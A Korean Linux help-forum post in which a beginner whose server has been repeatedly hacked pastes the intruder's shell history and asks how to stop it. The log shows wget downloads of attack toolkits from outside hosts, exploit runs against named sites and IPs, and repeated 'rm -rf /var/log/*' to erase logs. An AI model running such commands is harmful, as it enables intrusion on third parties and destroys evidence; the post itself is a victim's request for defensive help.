질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

해킹을 당했습니다..막을 방법이 없을까요?

작성자 정보

  • 변종해 작성
  • 작성일

컨텐츠 정보

본문

안녕하세요..
너무 초보라서 잘 모릅니다
똑같은 문제로..서버를 3번 재설치 했는데도..
그리고 hosts.allow 파일로..저희 아피에서만 들어가도록 했는데도
하루만에 다시 들어왔습니다
아래문서 보시고...저에게 광명을 주십시요..
몇번 하다보니..미칠지경입니다..
고수님들의 조언을 기다립니다
감사합니다..

#######################################
history 파일중 문제가 되는 부분입니다..

w

  313  cat /etc/hosts

  314  hostname

  315  whoami

  316  cat /etc/issue

  317  hostname

  318  cat /root

  319  cd /root

  320  ls -a

  321  cat .bash_history

  322  cd /var/spool/cron

  323  ls

  324  wget www.masftp.home.ro/k.tgz

  325  tar zxvf k.tgz

  326  cd k

  327  ./fun -t2 특정아피입니다 shop/shop.php

  328  ./fun -t2 특정아피입니다 inedex.php

  329  ./fun -t2 특정아피입니다 index.php

  330  ./try 128.134.130.19

  331  ./fun -t2 auth.hanmir.com login.php

  332  ./fun -t2 auth.hanmir.com login.php -s bffffb28

  333  rm -rf /var/log/*

  334  cd /var/spool/cron

  335  cd k

  336      ./fun -t2 www.piercingtribe.it video.php -s bffff660 

  337      ./fun -t2 bid.inhatc.ac.kr login/accept.php -s bffff90c 

  338      ./fun -t2 bid.inhatc.ac.kr login/accept.php -s bffff90c 

  339      ./fun -t2 bid.inhatc.ac.kr login/accept.php -s bffff90c 

  340  clear

  341  cd ..

  342  wget http://membres.lycos.fr/lolza/l/sslmass2.tgz

  343  tar zxvf sslmass2.tgz

  344  cd sslmass2

  345  ./httpver 66.81.232.5

  346  ./httpver 66.81.97.5

  347  ./httpver 66.81.6.17

  348  ./httpver 66.81.6.29

  349  ./httpver 66.80.219.174

  350  ./httpver 66.80.213.110

  351  ./httpver 66.80.186.39

  352  ./httpver 66.80.148.142

  353  ./httpver 66.80.73.107

  354  cd ..

  355  cd k

  356  ./try www.bangbrosworldwide.com

  357  cd ..

  358  cd /root

  359  ls -a

  360  dir -a

  361  cat .bash_history

  362  cd /var/spool/cron/k

  363  ./try 218.150.79.136

  364  ./fun -t2 특정아피입니다 main.php

  365  ./fun -t2 특정아피입니다 home.php

  366  ./fun -t2 특정아피입니다 site.php

  367  ./fun -t2 auth.hanmir.com login.php -s bfffe7a8

  368  rm -rf /var/log/*

  369  w

  370  cd /var/spool/cron

  371  ./fun -t2 auth.hanmir.com login.php -s bfffe7a8

  372  cd k

  373  ./fun -t2 auth.hanmir.com login.php -s bfffe7a8

  374  ./fun -t2 auth.hanmir.com login.php -s bfffc7b0

  375  w

  376  rm -rf /var/log/*

###########################

이상입니다..무리한 질문인줄은 알지만...초보자가 이해하기 쉽게..설명 부탁드립니다
다시한번 감사드립니다

관련자료

댓글 0
등록된 댓글이 없습니다.
목록

공지사항

뉴스광장

  • 현재 회원수 :  60,366 명
  • 현재 강좌수 :  37,037 개
  • 현재 접속자 :  239 명